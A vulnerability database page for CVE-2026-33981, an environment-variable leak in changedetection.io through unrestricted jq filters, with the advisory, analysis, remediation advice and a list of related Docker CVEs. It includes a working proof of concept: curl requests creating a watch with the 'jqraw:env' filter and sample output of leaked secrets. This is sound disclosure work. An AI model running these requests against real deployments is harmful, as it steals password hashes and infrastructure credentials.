Skip to main content

Docker EUVDEUVD-2026-16880

| CVE-2026-33981 HIGH
Information Exposure (CWE-200)
2026-03-27 https://github.com/dgtlmoon/changedetection.io GHSA-58r7-4wr5-hfx8
8.3
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.3 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

4
EUVD ID Assigned
Mar 27, 2026 - 19:30 euvd
EUVD-2026-16880
Analysis Generated
Mar 27, 2026 - 19:30 vuln.today
Patch released
Mar 27, 2026 - 19:30 nvd
Patch available
CVE Published
Mar 27, 2026 - 19:11 nvd
HIGH 8.3

DescriptionGitHub Advisory

Summary

The jq: and jqraw: include filter expressions allow use of the jq env builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed as env vars to the container.

Details

Vulnerable file: changedetectionio/html_tools.py, lines 380-388

User-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:

python
if json_filter.startswith("jq:"):
    jq_expression = jq.compile(json_filter.removeprefix("jq:"))
    match = jq_expression.input(json_data).all()
    return _get_stripped_text_from_json_match(match)

if json_filter.startswith("jqraw:"):
    jq_expression = jq.compile(json_filter.removeprefix("jqraw:"))
    match = jq_expression.input(json_data).all()
    return '\n'.join(str(item) for item in match)

The form validator at forms.py:670-673 only checks that the expression compiles (jq.compile(input)) - it does not block dangerous functions. The jq env builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.

PoC

Step 1 - Create a watch for any JSON endpoint with jqraw:env as the include filter:

bash
curl -X POST http://target:5000/api/v1/watch \
  -H "Content-Type: application/json" \
  -H "x-api-key: <api-key>" \
  -d '{
    "url": "https://httpbin.org/json",
    "include_filters": ["jqraw:env"],
    "time_between_check": {"seconds": 30}
  }'

If no password or API key is set (the default), no authentication is needed.

Step 2 - Wait for the watch to be checked, or trigger a recheck:

bash
curl "http://target:5000/api/v1/watch/<uuid>?recheck=true" -H "x-api-key: <api-key>"

Step 3 - The processed text file on disk now contains all environment variables:

{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',
 'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',
 'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',
 ... and all other env vars}

The data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.

Confirmed on v0.54.6: The processed text file stored 46 environment variables from the server process.

Impact

  • Secret exposure: Leaks SALTED_PASS (password hash used for authentication), enabling offline cracking or direct session forgery
  • Infrastructure credential theft: Leaks PLAYWRIGHT_DRIVER_URL, WEBDRIVER_URL, HTTP_PROXY/HTTPS_PROXY, database connection strings, and any API keys or tokens passed as environment variables
  • Cascading access: Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems
  • Affects all deployments using jq: Any instance where the Python jq module is installed (standard in Docker deployments) is vulnerable
  • No authentication required by default: changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration

AnalysisAI

changedetection.io versions up to 0.54.6 leak all server environment variables including password hashes, proxy credentials, and API keys via unrestricted jq filter expressions. Attackers with API access (default: no authentication required) can extract SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed to the container by creating a watch with 'jqraw:env' as the include filter. Vendor-released patch available in version 0.54.7. No active exploitation confirmed (not in CISA KEV), but a detailed proof-of-concept exists in the GitHub advisory demonstrating full environment variable extraction in three API calls.

Technical ContextAI

changedetection.io is a Python-based web monitoring application that supports jq filter expressions for JSON data extraction. The vulnerable code in html_tools.py (lines 380-388) compiles and executes user-supplied jq expressions without restricting dangerous builtins. The jq 'env' builtin is a sandboxing escape mechanism that reads all process environment variables regardless of input data, bypassing the application's data isolation model. The validator in forms.py only verifies that expressions compile successfully using jq.compile() but does not implement a security policy to block dangerous functions like env, input, or $ENV. This is classified as CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), though it also exhibits characteristics of CWE-74 (Improper Neutralization of Special Elements in Output) due to insufficient sanitization of user-controlled filter expressions. The vulnerability affects pkg:pip/changedetection.io deployed with the Python jq module, which is standard in Docker-based installations.

RemediationAI

Upgrade immediately to changedetection.io version 0.54.7 or later, which implements restrictions on dangerous jq builtins including the env function. The patched code is available in commit 65517a9c74a0cbe1a4661314470b28131ef5557f at https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f, and the fixed release can be downloaded from https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7. For Docker deployments, pull the latest dgtlmoon/changedetection.io:0.54.7 or dgtlmoon/changedetection.io:latest image. As an immediate mitigation before patching, enable authentication by setting a strong password and generating API keys for all API consumers, restricting network access to the application to trusted users only. Review all existing watches for suspicious jq filter expressions containing 'env' and delete any unauthorized watches. Rotate all secrets that were stored as environment variables (passwords, API keys, proxy credentials, database connection strings) assuming potential compromise. Review application logs for API calls to create watches with jqraw: or jq: filters and investigate any suspicious activity. For long-term security, avoid passing sensitive credentials as environment variables; use mounted secret files or secure secret management systems instead.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

EUVD-2026-16880 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy